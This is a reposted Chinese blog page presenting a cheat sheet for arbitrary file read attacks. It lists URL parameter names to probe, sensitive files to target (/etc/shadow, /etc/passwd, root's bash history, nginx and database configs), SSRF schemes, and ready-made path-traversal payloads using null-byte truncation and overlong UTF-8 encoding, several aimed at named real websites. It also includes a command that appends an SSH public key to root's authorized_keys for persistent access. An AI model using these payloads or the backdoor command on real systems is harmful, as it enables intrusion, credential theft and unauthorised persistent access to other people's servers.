首页 > 其他 > 详细

任意文件读取

时间:2018-02-14 15:30:27      阅读:32      评论:0      收藏:0      [点我收藏+]

标签:config   tracking   ont   sed   views   ack   passwd   enc   pro   

 

转自http://blog.csdn.net/cd_xuyue/article/details/50560259

敏感字段

&RealPath=
&FilePath=
&filepath=
&Path=
&path=
&inputFile=
&url=
&urls=
&Lang=
&dis=
&data=
&readfile=
&filep=
&src=
&menu=
META-INF
WEB-INF
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17

可利用路径

/etc/shadow 
/etc/passwd 
/etc/hosts 
/root/.bash_history 找user add,cd,mysql,ssh,nohop看敏感目录和文件等 
/etc/syscomfig/network-scripts/ifcfg-eth1 
sed -i ‘/95_251/d’ /root/.ssh/authorized_keys 
url=file:///etc/passwd 
url=http://10.29.5.24(ssrf内网探测) 
/opt/nginx/conf/nginx.conf 
file:///,gopher://,ftp:// 
/configs/database.php


Payload

  1. http://...:8080/%c0%ae/WEB-INF/classes/com/huilan/application/action/PeopleBankAction.class

  2. 配合截断规则:/etc/passwd%00.jpg

  3. ../../../../../../../../../../etc/passwd%00.jpg

  4. http://www.zzvcom.com/cms/interface.jsp?time=41&data={readfile:%27/WEB-INF/classes/jdbc.properties%27}&jsoncallback=jsonp1442909681355

  5. http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

  6. http://www.intime.com.cn:8000/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini

  7. echo ssh-rsa 
    AAAAB3NzaC1yc2EAAAABIwAAAQEA0jrJeJfEURdpG/jddXzk3zZYxQfdHbgPC4QYh5qx0F2SS1Q+uCW6j2cM/SxqhocfgDYw1CTikNTlJ43tzv1ozpSRjmLH26aTxGDUnXsvyVLeWdrjPni1FoVffW+LM0rZVh7A74Vi1bDr7IP7XjSMQU157rye7++G+eWA1NhscIiiJ/pwUKAjPSiEx+8DXN8ccTDyWrSnD+NfUQXPO4dVFu2MR5/VjLO2yWsVMwenCPwItf5xEwGqU5KbzxeTOyDnYYLk7UF6lBYpSDZC9U3mNL1alYgNnIbmZGYg921KFh28BRptDewh5MRDKmfMUSqeZpIZ95Pq8lG1sObcjNzDew== root@szmlserver95_251.easou.com >> /root/.ssh/authorized_keys

任意文件读取

标签:config   tracking   ont   sed   views   ack   passwd   enc   pro   

原文:https://www.cnblogs.com/drkang/p/8448356.html

(0)
(0)
   
举报
评论 一句话评论(0
0条  
登录后才能评论!
© 2014 bubuko.com 版权所有 鲁ICP备09046678号-4
打开技术之扣,分享程序人生!
             

鲁公网安备 37021202000002号